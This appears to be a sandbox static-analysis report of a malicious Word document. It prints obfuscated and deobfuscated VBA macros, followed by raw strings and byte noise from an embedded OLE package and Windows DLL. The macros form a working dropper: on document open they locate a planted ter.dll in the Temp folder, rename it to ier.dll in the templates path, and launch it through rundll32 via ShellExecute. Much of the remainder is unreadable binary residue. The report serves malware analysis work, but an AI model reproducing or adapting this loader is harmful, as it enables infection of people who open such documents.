Static | ZeroBOX

Original


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
  Private Declare PtrSafe Function gc Lib "shell32" _
        Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, ByVal lpFile As String, _
        ByVal lpParameters As String, ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long
        Dim hdv As String
        Dim bbbb As String
Private Sub Document_Open()
Dim vcbc As String

Dim cx, dfgdgdg
dfgdgdg = "n"
cx = wdUserTemplatesPath
bbbb = "r"
vcbc = Options.DefaultFilePath(cx)
bbbb = bbbb & "u" & dfgdgdg
Call xz
If Dir(vcbc & "\ier" & ".dll") = "" Then
Call yyy

If Len(hdv) > 2 Then

Call nam(hdv)

Dim pattison
pattison = "\ier.d"
pattison = pattison & "ll"

 Dim cvzz As String
cvzz = "l" & 4 - 1 & "2"


  gc 0, vbNullString, _
    bbbb & cvzz, vcbc & pattison & ",HINYYIMIVRX", _
     vbNullString, 1
End If
End If
End Sub



Sub xz()
bbbb = bbbb & "dl"
End Sub



Sub hdhdd(asda As String)
Dim MyFSO As FileSystemObject
Dim MyFile As File
Dim SourceFolder As String
Dim DestinationFolder As String
Dim MyFolder As Folder
Dim MySubFolder As Folder
Set MyFSO = New Scripting.FileSystemObject


Call Search(MyFSO.GetFolder(asda), hdv)

End Sub


                                    

Deobfuscated


                                        Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Option Explicit
Option Compare Text
  Private Declare PtrSafe Function gc Lib "shell32" _
        Alias "ShellExecuteA" (ByVal hwnd As Long, _
        ByVal lpOperation As String, ByVal lpFile As String, _
        ByVal lpParameters As String, ByVal lpDirectory As String, _
        ByVal nShowCmd As Long) As Long
        Dim hdv As String
        Dim bbbb As String
Private Sub Document_Open()
Dim vcbc As String

Dim cx, dfgdgdg
dfgdgdg = "n"
cx = wdUserTemplatesPath
bbbb = "r"
vcbc = Options.DefaultFilePath(cx)
bbbb = bbbb & "u" & dfgdgdg
Call xz
If Dir(vcbc & "\ier.dll") = "" Then
Call yyy

If Len(hdv) > 2 Then

Call nam(hdv)

Dim pattison
pattison = "\ier.d"
pattison = pattison & "ll"

 Dim cvzz As String
cvzz = "l" & 4 - 1 & "2"


  gc 0, vbNullString, _
    bbbb & cvzz, vcbc & pattison & ",HINYYIMIVRX", _
     vbNullString, 1
End If
End If
End Sub



Sub xz()
bbbb = bbbb & "dl"
End Sub



Sub hdhdd(asda As String)
Dim MyFSO As FileSystemObject
Dim MyFile As File
Dim SourceFolder As String
Dim DestinationFolder As String
Dim MyFolder As Folder
Dim MySubFolder As Folder
Set MyFSO = New Scripting.FileSystemObject


Call Search(MyFSO.GetFolder(asda), hdv)

End Sub


                                    

Original


                                        Attribute VB_Name = "Module1"
Dim pls As String


Sub ousx()
Call uoia(Options.DefaultFilePath(wdUserTemplatesPath))
End Sub




Sub nam(pafs As String)
Call ousx
Dim oxl, cxvx
cxvx = ".dll"
oxl = "\" & "ier" & cxvx
Name pafs As pls & oxl
End Sub


Sub uoia(fffs As String)
pls = fffs
End Sub
 


 
 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object
  Dim fffff
  fffff = "ter.d"
  fffff = fffff & "ll"
   For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc
Dim Ters As Object
   For Each Ters In mds.Files
   
   If Ters.Name = fffff Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub









                                    

Deobfuscated


                                        Attribute VB_Name = "Module1"
Dim pls As String


Sub ousx()
Call uoia(Options.DefaultFilePath(wdUserTemplatesPath))
End Sub




Sub nam(pafs As String)
Call ousx
Dim oxl, cxvx
cxvx = ".dll"
oxl = "\ier" & cxvx
Name pafs As pls & oxl
End Sub


Sub uoia(fffs As String)
pls = fffs
End Sub
 


 
 Sub Search(mds As Object, pafs As String)
 Dim Nedc As Object
  Dim fffff
  fffff = "ter.d"
  fffff = fffff & "ll"
   For Each Nedc In mds.SubFolders
     Search Nedc, pafs
   Next Nedc
Dim Ters As Object
   For Each Ters In mds.Files
   
   If Ters.Name = fffff Then
       
        pafs = Ters
        End If
   Next Ters
   Exit Sub
ErrHandle:
   
   Err.Clear
End Sub









                                    

Original


                                        Attribute VB_Name = "Module2"

Sub yyy()
  Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
    Call bvxfcsd
End Sub







                                    

Deobfuscated


                                        Attribute VB_Name = "Module2"

Sub yyy()
  Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.MoveDown Unit:=wdLine, Count:=3
    Selection.MoveRight Unit:=wdCharacter, Count:=2
    Selection.TypeBackspace
    Selection.Copy
    Call bvxfcsd
End Sub







                                    

Original


                                        Attribute VB_Name = "Module3"
Dim dfbvc As String
Sub bvxfcsd()

Call asda

Dim ewrwsdf As String
ewrwsdf = "L" & "o" & "c" & dfbvc & "mp"


 
    ntgs = 50
sda = 49


While sda < 50
      ntgs = ntgs - 1

      If Dir(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Call ThisDocument.hdhdd(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf)
End Sub


Sub asda()

dfbvc = "al" & "\Te"
End Sub



                                    

Deobfuscated


                                        Attribute VB_Name = "Module3"
Dim dfbvc As String
Sub bvxfcsd()

Call asda

Dim ewrwsdf As String
ewrwsdf = "Loc" & dfbvc & "mp"


 
    ntgs = 50
sda = 49


While sda < 50
      ntgs = ntgs - 1

      If Dir(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf, vbDirectory) = "" Then
        
    Else
  
   sda = 61
    End If

   Wend
   Call ThisDocument.hdhdd(Left(Options.DefaultFilePath(wdUserTemplatesPath), ntgs) & ewrwsdf)
End Sub


Sub asda()

dfbvc = "al\Te"
End Sub



                                    
EMBED Package
IDATx^
Ar51"(
o01`ZZ!
j>t`lu
D+qlY*
|ttT=N
^`O<@\\
1sGN4_
Swfcuh
{6n.lM
2_1>=.s
3GY(Kx
}ay==_
wFB_/-
z4I9<NO
|}}M|v
n+_\3?
f>A9-~
x,:0UO
Byi6wl
69G`Gr
[T}Yms
Y>2G}R
+^{=YL}]
uHmv0c
PO%l1S
o{%d76
IaT'fG[
=*q}iq
tX(aJ~
h^GUw;S\
h(ugJa
L[Yl|X
sM<[J^
NNlm0s
%#*%u
H5{Yk?Ay
<~sb}
P-Q6wc
u7u-Z3
K|#R!/
shSE=L
5wowZ'
u}Vu05R7z
:/_6Wx
:O)/Bi
-P^'V
e*}[v]
av-nt/
0>D4ou3
9TVT,;z
fK~F~]
#Sq(?P
GOw{6
Ym$H;t
y&m7#T
}(SW@
do_i7C-
#+kWe
f[kvx"
kP4nf=
_~8"N>
Ry)-DR
FxZW2*
/wq!`+
UlL(&b
bc"&fF
. 2,K?/~
7z$O'~
Ks9)3B
uhrCPk
'eJy8^
zrSDeP
^ka+qI
!?c?=m
IOmnZSmW;
kKDF^7
9$H"=v
QfQ~P
f_zTHnm
|)Pf /
W!^n>f]9
W.F~6(^
:ECx}B
+N`*_o
${u<q{r
%lFy[:
IV_{io
IY$v\&*Y
]dC'aq
3nwM1i
9rzUnl
!q +@T
u#e]t@
0^i:o)
v(wQPQF
?4aR42
H_!>,g
c,ye">
V>W0N
+BDsZ?E
S[F?P^J
^&r=|b
5Ks_YE
<dHseP'
8D~6k~
dCQHa
)b/AnO#
(iR=P,r
;LA<*]
;WOnz}z;]
vg,syb
7emM@n
n_cbLz
*VG7yE
A~~H0n
+nx'MG
$GD5S
+tY[Fc[
;v%$tI
:Tyr7;
^fQ~^
4IJ>l
o5kvUtz
W._v%e
:'mO<>!
5ZU?il_
ES|#bl
jl6%]zW
}}]u;ogP~
!Ky8d|
C&J=O[
L:LMM>N
'k`,o0
Sx[r;?o
is(!5n
0%PP9
A{O}A{eNh
UmbdW4
I@:6|t
)p0=zf~
xj^Eqa
-dM@Cw
jKgmcK+e
cY6!#C<W
@x|q&w
wZXZV]
cbsFX:
inO<?h
#ZV5n,
6glP0|
P6BjK~
MkVdD'_
U=PlKb
sj|_s@EfN
lhY|`p
|XZ^v\
~WcB{_aj
dTDGuj
|jfJ"N
W+wP4kC<
M@(|:,
9H#<9L
}(U2JN
Yu,n6#
%>WO9c[
\ISaS>g
NY.c)^=
l?1O=J
F1v2;A
Li:L<I
IDAT0WT
"/|X_
tm{[rF
C:N#F<ql
4A*/*
NFnn9O9
k\SV|S
>-B2;s
-O7]6O
H'<L(+
6Q@1ut
[o9_hg
G`L<\/J<
M?<=PY
k@L{<-1
tyx|\'N
R6n&P 
?B6i'xH
YZYliF
S~?s,
W{Y@re
N~RP~@
.I'WN~
7*SAic
>@ea!?
5By<kFW
f3)<)7
Ev:QH?!
28*Jq's
P8p"+]
PcsK\l
x)+N QO
U?5I8rGX
:A_(`0
a~BJm6P9
>`dSoL
$YciB
tr&E![
c9'v0Z
|'eslz
SG%W/c
A(2cHq
n\sdqL
'J#G[rV
UN[y\S
LF3a.{}
m=ZVv1
vt^zB]
+XH9rm
7g~{o`
cKg3z
\[XW{A
b3x7?X
X0.?2;a
{g}~h2
'kOk+:
c\~dvf8
tIG%;^_y
r"&g"
838>8%
Hd^]W{
]W^|!x
x}j6,o
Y82?17
N:ibC,>
gBo?#8
z.'bt<
FW_j_6
mIsD)O
5y6J@~
zSO>Z@|'
Z=ryp<
nTV?8L
zpq0p>
*@;s${
ymn{9t
b61)ElM
+>R'nz
%w+697o
``X6O6
v+'Z0a[P;qy"
piOWC:e
XcOB~x&
QVY~16:P
rXINQ
'-_ZP^
pBJl#isz
k/kgPk
>@]GIK
/]Qgr#
nw[Ao/
_'V"6t
s_2Gqp
}g:xL~
`>T^!0
!=z`>bvU:
od'OA
n-lf5l
eex:T=
7^,,|p
en$c<W=
5n$W_z9
m3bab
YQv*6k
sXIyZr!
Q=1Zn\
/6$_}|
6+d@K(
rl J6e~
*]ecP&?C\
4;/G ^
s.5gZOh
]Mv~Qr
:VWWWW
:xhs\;{$
:(G>m)>
:r82on
d*#*eK9hA
e9Z("3
4:*3jJ#
@_$t|
_O;9_h
V8|]sdE
9z*SyUv
4|q%+z:
'B&D;g
R7G~}+
'eq&X~
9F(|bW
0LzusG
fB^>t
(FwL-[Nv
}D.#
0b1|Q`
qzPaKq
f58>w"e!
ED8!o2&
7xvs(A
2O[R6e[
R>Rb^H
Yx?z<
$JL~.<
/(:T<_]
n|n7z
JOVwf{
Go[2x-
sm[\Sh)
ow,"-&
QeT$^1~
5HbnN
qYcXjg
`=X;~ex
#+^]UV
(Rp1iXt
Z8g9C}E/
Jr@-Q<
}(='-e
j!0 !$
Kw<dH.
X5pMX;
EJxN@&
Yr1Bh'
KEvPR-
"9)x'!|;
]-.b\j#9
EG%~C;
gtH}B|
>wM!pv
EO}]mI
h^mw/NX
gd+wvk
1*"<x=|V
1<(O5~
&(^7>K
r9`|vr
mpf|d,
<%o\[Dvcr
;xgfj{;
9@a1)zm
?Lre$d
r`LOn2~5X
@c=7$
=h;lKk
O6Cgo}
#m{X%-
ChQXOU
$q{WC2
}7yLl|T
.[E7S?
c7ZT'=
7\W)[
<p8]O6k
65nxm^
=kGQp$>*
:B:Zh9
1({z$hO
Id:x t
u/'A|T
r5ns}.
?7rdBt@N
r9fjC
vPp]6]
F\(;Q2
[9f:<`L
@_y2+2
&Tb,<}
*.~5Y1
1y sMR
$~Aaj&
Wscs^'
wV7\~S*
};I7oW
o3V%w
5N$M(k
a{sk8v
=u*,T
LVpVTP]W
9Sd8^=
_ZZ~Iq
OI}W*O/
&4u_(~
.#.?e.=
~f|}Q:
0x49R'id
,6azLy
a\q2v@
%Qehq\$
T-IKO/
mLiekst
rU>;d[
fw[}X(
J7yB.Cn
K.2psS4
+<tBA;
!*7e9
zeX;rh8
}Oj]:t
amR]k
JGeCn*[\
E~ViP)
bQW'G|
F^:{6y
*'i:S8
B\v1X
J;/20
>\KS.?
ovA_^
xZ@ZXZd+_}G
>':ckdWjg
JNC,g`0
j`R9`R
{+|EA}
6J[6q>,
HkW\zy,:c
:kl"K|
U>9G(oR
=t91=3'
c;`Q,T<
1+V.ok
<Qz6N:viq,
[d"M:>
KcMyB\
bk2GG9
vkQn?3
NZeU<Pf
px]Pm%
HG~@Z;
W2U^/;
FO>qkO81
K/kW^vy
C_:vou
N{h1TP|
D:uQgv
G,Zt_[
K|Y)&0
e/sgE<
i:*G~6
OoW]{M.`-
9_|7V3
jW]qe{
1vO7tA
~mc@+M
3wLq Y
kW^~E
E9xtoP
GyU.;|
o!f1`lqmg
q^~85
^/%srT'4
kE~1}A
Kcr{Q;
B|fzej
N<9tlM
z]U;r~
l0|6L[r
(=1gbK
@!=c8a
G6&rv^
]|,P<T
fy0\ w
zM?sVy
+y6d(;
:.-63J
%guWq
tYc0|>
Py;wlkS&11
TeZ.C8TV30)
rU/c~9
(d(J)-
s|)O>sq
f=#=yy^i
PyvYyES9H
:hNVc @
2&5ap_
@*Nt.y
fb8D0~?
0~xmQQ
.lW_{M.4
3gqo^8
dMlNe}k
'>qzn.
'nl+cpSWg
dTmCvt
0yfwggvg
)`Vu~)d
w;;|o
C^6u?~
x$2G'>p
#xFWF
O=U?xP
,XL2LF,B
3t3t$tA
|NTQ.y
rQ?S{{?+
PA8eM[
maZWI
@<<-[W
at)+~`
C:VAJoU
Ii@z-@K
DPEC|a
`FI0e
C:@y\Sw
g_NxJ[
U\yoK
m#=77k:
L7>nz,
&"V+~19r
N?C*3A
x*u#mZo
+ iDGv
,OP8 m
3'@NMN
yS9Qn
wph0*<
".M#C[
y:i&<V
7r>to3
~ M{oU]
-}Lccg
4UyR4D7
UE#E:oU
|leNksJ
#nB@YV
ck0s%<
*FOHeU
MuC~pP7jW#
;9i}t:NV
{OkNuU^
4*gtt,
uH7XUeH^
1^AD}X
#^NalzH
=xG^8x
PS(LQ
O./hTA
Se(y`q
~vi\8u
>%:@FPN6F
)|Qn=b
Sanf:,Yx|q:
JKY@e@
$]S6tHC]
s(G(F\
=.)C4R?
<z2qj*
M/`CKZ
VR_8~r"
_0pR7x
mb_d!4
?P.2'-
Y`(d/H
nD<WP
q:ndp$,
M5|p-]
#}4x,
LxdL O
~H8:"k
!G9&7qF
od@{0>0
Q`TBW`
S{o&in
.f!NAm
+mDWxT
_M5)RVlW
r7vZ4]
Niq)S<
9s./dl
aK^BypM:~
U"#M,1
VVh7kU
K;UgF/mD
q%]K6
1O]|v
x'<R?T
OW]{m
Uzk
_7dng
|me7wa
G:td1]
4K1kVp
7Rul-9?w
Mo|C:y
n?}*]u
>~%e1H
o3:q
_e|nB[
A]XD[|
]JL1Yv
^?RbXgM
[F9?Uk
Q^Bm^dm
ueFjCLS
\JlE/w
E:P|D]X
I?]GM1c
r;gL y!
tgj#]\
`LOOe#!<f
MP=M4(o
=z4-wVm
D6[+6_
&?x#?9U
`I`PXD]XW
tAS\L#
oNW^ye
"*u(Bu
1\,,.z
C[h'a\g
7:AJzd@Z
H'u5_4
IgL>28
w6hR}(Y
|qM8y9a
h+m&/}
JP?8Ye
h._2S]
fcL{-cw
xNcq2L
Q?yHG;
YG.&,7
#S''1e
K:xe,P6m
F7h#FA
hNZ*NsO
&Y\<aLT
2yrm\;
+cvv&]
S+Nl).
lBpIY{2a
%O_]ot
sR6nc]
:!hds
Hy ]_m
M(qlH91'
IK}RG\
.-Yovb
;M?+4fb
2hON_a
Z00!A~
,EF;C.M$
>l|G&W
kx0(P^
.FjNYb
!Mdi"X_K
r^KPYA,+
Zt(>wmie
:U["O
NztA&yP
8|STc3
}P}A\C
A\~@`,
Yu,!/kI
0CuBY#)|
4Bl[j=K
q]kyuP^
vN4=jY
i.`>MO5l
4`,]VG
#n7P*
Erk>AF<
1W-,-V
0`?P6*
7-uaR\
f"}9%]
6LF# {
"hk:CvJ+G
TD3]gl
s$2??V
L<?rM"
!o/&'#
@|dQwa~%.
xJiJa
5]O*>)
.V+W.W#
0%sO>~<
rv;#a<2
n n\Ec
K_G^gN
F]&?GW~
rn5zFL
>XBGWo
%pSFNz!pn
h}2NZ1N
KUxJ1b
B.[qrA
q n*b|
"b8'dN
%cz]wQr
kz'ats
)*Vm0+b
Ms}cfC
~](WB9=
)mtZ 3B
@FuaR
yk1Nxl3
,LB_^l
< .Db>
@du-wq>
%SD}Nk
#a<}n8!mLO
bz4R6x
`R]E>!
KnHT#j
mPc<F?@
[X$A~x"
O`k\jo
ov<?\
r*Eu%W
1("]nXP
32"E(>"
<0pwU
xxn2C!
~R0'ac
2kw[bZ
y\g;^Cg.z
QO|ehg
M/?=A`
6O6H.
MhvG_CH|
nT|BgX
\.lv-Wm
B|L`}
7:26hK
,hi+(,
!e`\sj-
kE?5-;!^:
;a>1H?
29lO`[
6?5LoN
4.Jq776
{1CG<u
[~ps!
7o>ZS
_g\0E_
3ufK<s
E|Pc|1<hb
73{kHz
OLE Package
Package
Normal.dotm
ter.dll
C:\Users\MyPc\Desktop\Builder_v667\ter.dll
C:\Users\MyPc\AppData\Local\Temp\ter.dll
!This program cannot be run in DOS mode.
`.rdata
@.data
.reloc
9CX}/H
q`v}[:
ubkHD@
68]U#?.
W~eTcr
H|C`tH
H'HIHHH
5\Umy;
$Hf; #
J H:H[H
,Xm2P
;'`E-6
}HX 8
M'H_u3
tH$ $P$
}Io{ZB
_s0+*t
6pc&)o/
UHHM0M
IHKJU! #;456@pAB!&'$
&3c_pW
HHLEH
HL-tbH
g;@,>l
B[4u([k
HHkHH'
8EI$HHH
<H $3u
@ILHHI
,H/ H@
2v* xB
Qq`Lvw
W<~^D[@
HH@LH\
L$\5Y_
HHH$ H
CH0UM (
HHH;EH
.`tHHH($U
HHHH0H
()WH(;
0+WPdu_
(*;S0
(!EHLU
HXH$D@
pM)/H1
HUHH$WEb
L@H IH
T%I@pH
1c{0H$
$c9A$I
@HH$p3
A!CL00
3"H%`LWH
XDHHPA
($pvt$
KzHKH_HX
t%0_EH
E@SH$0H
0DIHte
$A@ItH
H$EH-
AEEcTH
\ZHHt$
@<HE@H
/[Z(HM
@(AHXL
H0HuHH
HEa9%
qHnL8H
\SHAHL
LKtL$CH
L0EHAH
DH*0$W
(HHuHH
S^HH$H
HtHHDH
p%jRWH
#HUH A?
PHHHDHmU
HLL@L;
HDKEHF
$H]`&;%
HH[HtH
HH3$HH
(H: H@
HP@HH"
LHH$3,H
=IL tR!
DHHtHH|$34
p$DHnI
HHHH(/
SH/({G
HQLHu0
YYum9}
t&97u"j
.;1s(N
HHt4HHt
Ht`Ht,
teHtFHt&Hu
ty<%tA
t^9(uZ
tD9(u@
Y9>t7j
QQSVWd
PPPPPPPP
0WWWWW
0WWWWW
0VVVVV
HtHu4j
s[S;7|G;w
tR99u2
YYu-9D$
^SSSSS
^SSSSS
0A@@Ju
0SSSSS
>:u8FV
^SSSSS
j"^SSSSS
j(j ^V
YYuTVWhl
C PjPV
C$PjQV
C*PjTV
C+PjUV
C,PjVV
C-PjWV
C.PjRV
C/PjSV
0SSSSS
0SSSSS
u|Vj@h
t.8t*W
PPPPPPPP
_VVVVV
^WWWWW
>=Yt/j
t#SSUP
t$$VSS
_^][YY
zukSSS
t+WWVPV
uL9=p$
URPQQh
;t$,v-
UQPXY]Y[
HHtAHHt
0SSSSS
_VVVVV
u,VVWV
<+t(<-t$:
+t HHt
u&f!;f;
YYt\VV
YYt SVW
bad allocation
#|ymjc
ca9de`
I0w':
:Q^ Ml
`m0;m)
MMMMtttt
8888%%%%
Brr#H"
UPfPO
r e e,(c
<typeparam name="T7">
</typeparam>
<typeparam name="T8">
<paramref name="value" /><see langword=".Rest.Item1" />.
</typeparam>
<typeparam name="T9">
<paramref name="value" /><see langword=".Rest.Item2" />.
</typeparam>
<typeparam name="T10">
<paramref name="value" /><see langword=".
<paramref name="attributeType" />,
</returns>
<exception cref="T:System.ArgumentNullException">
<see cref="T:System.Security.AccessControl.CommonSecurityDescriptor" />
</summary>
<param name="isContainer">
<see langword="true" />
</param>
<param name="isDS">
<see langword="true" />
directory.
</param>
<param
r
</param>
<param name="pExcepInfo">
</param>
<param n
qD at
ey i <
ibicss
aqeS.e
p :t
c> n "t
ag c :
ecnsrma,
i . ;ry
ee
dl<a
CT r"
te /
. m/i"<re
st i n.s
R=tI m
o e"a>b /
a.C /
m np a
e . .e
,or .
n>l
h/ nR
u > t
e nS d
mr ei
" e
re . n
e .
t mu/
p>s erll
e re .
e= s
m
e<b>
epr"ast
naT r.w
atl( e
"8Dt_m
B euS
e e=oae
rp> >
=e a
ne=daam
mnng.<i
T a p"
iT .S
ea a e
yt
No / a m>
o
uca >a
otm me
"/ mha
: I/> p
Rml reo
n aaa a4c
u e =
smr=>c
.rt IRs
mepioa y3<
yie. a
a eymey"eeI
S. m
er m
tlE
m Ts m,
Ul c 2y
/etae tr "T
>a96^Tvn
Qhcwwd
Rw[~[d
xjxv}}}
Ps#3Mq
pfra
E e
r"jni
tsste
ls <.
.iem a
G iR bo
mF e Lc
el tmR
<my}y`
z TioE
e ca./
K"e ae
ae <
t Cs.
"a >
eta L
ma u
r mmRemad
eS +rrs
<te yarem
us= t y
t 2u
.occp R cym
j fpjm
y .e p
d=rao
e.<e/
e e i
s u p"o
> >e
o e"b g
i mS<=
n r m mr
.gp fx
gPexf
y a
m /SeP
y o.e
.e c:
m/de o
" t<f"
< S y
ucr /
=y T" :
b mse
m "e
fr f
Ludy
m.r"m
mt / m
y egs c< .
FeATte
s l
sk <>
/ ms
mpn ym
e adri
" if
m>te
r) n "o
euI> n c
.BS e> e
x/ >"
t m #et
Im. l>tgc
d s
,ti
e<r b s
"= n r
elor naeey
e =a
s ep
s . i
.t/c" - K
<lgF"
"t eg
y E
sn>tt
iam =ot
a<"
ul r/et
nod ar
is t
xEn e o
n
fmr
e
` " G>
p =p
m>sSu
arl"mr =
"i l pe
ec =i<
he " t=m tp
x"s
mf r
ulM rb
= eroe
p ndr
a,t <
/. e
a << r
::m `dm
yoear
mm e<
h.afr" r
=y af
fsEu <v
a" l
tmyCmm
= a S.e
Suume
o
sap=ba
mebe >
Lln a
xoimP
rt r r>a
cr Enb=
oa nm
oaaas
te m o
u t a
> n>
rs Sie
>Cm. c i
n r pa<"er
e e t
i .
.. up"l.
ycma <
>Te d>T
i erz
n>>
u= Sfe
pnm<e c
<.<=`
2"t= <p
C ar b
ca. "a
t im
F <p
eu g
ne
m :e>
me-
"<S /s
r e f f
t"
e >e
i/<:s
.me
ym >
=e=t e
x =F >
nn Oraul
a p na
cmC nm
ae<aoa e .
ery >
a c""
pgse R
sCL en
I tao
/f e
ol=y > t
c nr
yli e
tt ee > g
.m p
ump/pv
ae o
s rmc /
ern m.
i=d
u
c< iA
A`> ey
nv< p
eie ee
a .e
ax .
e t,a
lTr
m " mt. bn
,bm f
r "i S."
>n rmet n
> at <a
mr>nS:
z o
mmy."
r Vso
nmoA m
uloe k
a y
O"" ie
S T=n
r >= e
T<-
ni pP
a .NtL e
ire sk
r> s pe
b. x
c p p
cf<e y D
my " >
"=e,os
t
r G h
icro S
Sms y
ire a>o
nSe exOee
t c.mi
e ce Im:pl
e et<tN
tn mca
rrbye/e
GSmt"s
ie(n"
0 <rno
ei. s, e
n o
ee. rum
t
r h.".
sEnS
"" e
tle aB
ostot
/rTmpf<
mm"s "
s>amn
mcee,os <
r .
eanEr=p
t "pm
t me
>m>Gfmto
c"t lc
gpT o
C" Aoo <
>m rOeAu
e <
< A .
Di>
e>ss/
e< >yO
f n e.e
p "i
n et
cT.mpS
f r=rb
a mo
( Cea
r Cm
A <
r<" e
eg".
rSe <s
esp
g ".9t
asmgbr.
r agy
p v a
f mt
mxcnsfy
,sw 2 <
tyi i
= IS u
.. ST
sm.mS
eScSo
a/zel "
iir:m
"><e l "
e I n ee
eir
<see langword="varargs" />.
<see langword="null" />.
</param>
<exception cref="T:System.ArgumentException">
<paramref name="opcode" />
</exception>
<exception cref="T:System.ArgumentNullException">
<paramref name="methodInfo" />
<see langword="null" />.
</exception>
<exception cref="T:System.InvalidOperationException">
<see langword="varargs" />.
</summary>
<returns>
<see cref="T:System.Tuple`8" />
</retus
="F:System.IO.FileAccess.Read">
<summary>
<see langword="Write" />
Produce
gas Ob
ios_base::eofbit set
ios_base::failbit set
ios_base::badbit set
bad cast
bad locale name
bad allocation
string too long
invalid string position
HH:mm:ss
dddd, MMMM dd, yyyy
MM/dd/yy
December
November
October
September
August
February
January
Saturday
Friday
Thursday
Wednesday
Tuesday
Monday
Sunday
LC_TIME
LC_NUMERIC
LC_MONETARY
LC_CTYPE
LC_COLLATE
LC_ALL
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
Unknown exception
bad exception
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
EncodePointer
KERNEL32.DLL
DecodePointer
FlsFree
FlsSetValue
FlsGetValue
FlsAlloc
SunMonTueWedThuFriSat
JanFebMarAprMayJunJulAugSepOctNovDec
CorExitProcess
mscoree.dll
runtime error
TLOSS error
SING error
DOMAIN error
An application has made an attempt to load the C runtime library incorrectly.
Please contact the application's support team for more information.
- Attempt to use MSIL code from this assembly during native code initialization
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
- not enough space for locale information
- Attempt to initialize the CRT more than once.
This indicates a bug in your application.
- CRT not initialized
- unable to initialize heap
- not enough space for lowio initialization
- not enough space for stdio initialization
- pure virtual function call
- not enough space for _onexit/atexit table
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
- not enough space for thread data
This application has requested the Runtime to terminate it in an unusual way.
Please contact the application's support team for more information.
- not enough space for environment
- not enough space for arguments
- floating point not loaded
Microsoft Visual C++ Runtime Library
<program name unknown>
Runtime Error!
Program:
united-states
united-kingdom
trinidad & tobago
south-korea
south-africa
south korea
south africa
slovak
puerto-rico
pr-china
pr china
new-zealand
hong-kong
holland
great britain
england
britain
america
swedish-finland
spanish-venezuela
spanish-uruguay
spanish-puerto rico
spanish-peru
spanish-paraguay
spanish-panama
spanish-nicaragua
spanish-modern
spanish-mexican
spanish-honduras
spanish-guatemala
spanish-el salvador
spanish-ecuador
spanish-dominican republic
spanish-costa rica
spanish-colombia
spanish-chile
spanish-bolivia
spanish-argentina
portuguese-brazilian
norwegian-nynorsk
norwegian-bokmal
norwegian
italian-swiss
irish-english
german-swiss
german-luxembourg
german-lichtenstein
german-austrian
french-swiss
french-luxembourg
french-canadian
french-belgian
english-usa
english-us
english-uk
english-trinidad y tobago
english-south africa
english-nz
english-jamaica
english-ire
english-caribbean
english-can
english-belize
english-aus
english-american
dutch-belgian
chinese-traditional
chinese-singapore
chinese-simplified
chinese-hongkong
chinese
canadian
belgian
australian
american-english
american english
american
Norwegian-Nynorsk
(null)
`h````
xpxxxx
GAIsProcessorFeaturePresent
KERNEL32
InitializeCriticalSectionAndSpinCount
kernel32.dll
GetProcessWindowStation
GetUserObjectInformationA
GetLastActivePopup
GetActiveWindow
MessageBoxA
USER32.DLL
Complete Object Locator'
Class Hierarchy Descriptor'
Base Class Array'
Base Class Descriptor at (
Type Descriptor'
`local static thread guard'
`managed vector copy constructor iterator'
`vector vbase copy constructor iterator'
`vector copy constructor iterator'
`dynamic atexit destructor for '
`dynamic initializer for '
`eh vector vbase copy constructor iterator'
`eh vector copy constructor iterator'
`managed vector destructor iterator'
`managed vector constructor iterator'
`placement delete[] closure'
`placement delete closure'
`omni callsig'
delete[]
new[]
`local vftable constructor closure'
`local vftable'
`udt returning'
`copy constructor closure'
`eh vector vbase constructor iterator'
`eh vector destructor iterator'
`eh vector constructor iterator'
`virtual displacement map'
`vector vbase constructor iterator'
`vector destructor iterator'
`vector constructor iterator'
`scalar deleting destructor'
`default constructor closure'
`vector deleting destructor'
`vbase destructor'
`string'
`local static guard'
`typeof'
`vcall'
`vbtable'
`vftable'
operator
delete
__unaligned
__restrict
__ptr64
__clrcall
__fastcall
__thiscall
__stdcall
__pascal
__cdecl
__based(
`h`hhh
xppwpp
1#QNAN
1#SNAN
CONOUT$
c:\Toward\die\971\car\Two\Tone.pdb
GetFileAttributesA
CopyFileA
WaitForMultipleObjects
GetShortPathNameA
GetEnvironmentVariableA
RemoveDirectoryA
TlsAlloc
TlsGetValue
GetSystemDirectoryA
VirtualProtectEx
GetCurrentDirectoryA
GetWindowsDirectoryA
SetConsoleCP
GetModuleFileNameA
GetModuleHandleA
KERNEL32.dll
GetClientRect
GetDesktopWindow
CreateDialogIndirectParamW
GetForegroundWindow
GetSysColorBrush
CreatePopupMenu
DialogBoxIndirectParamA
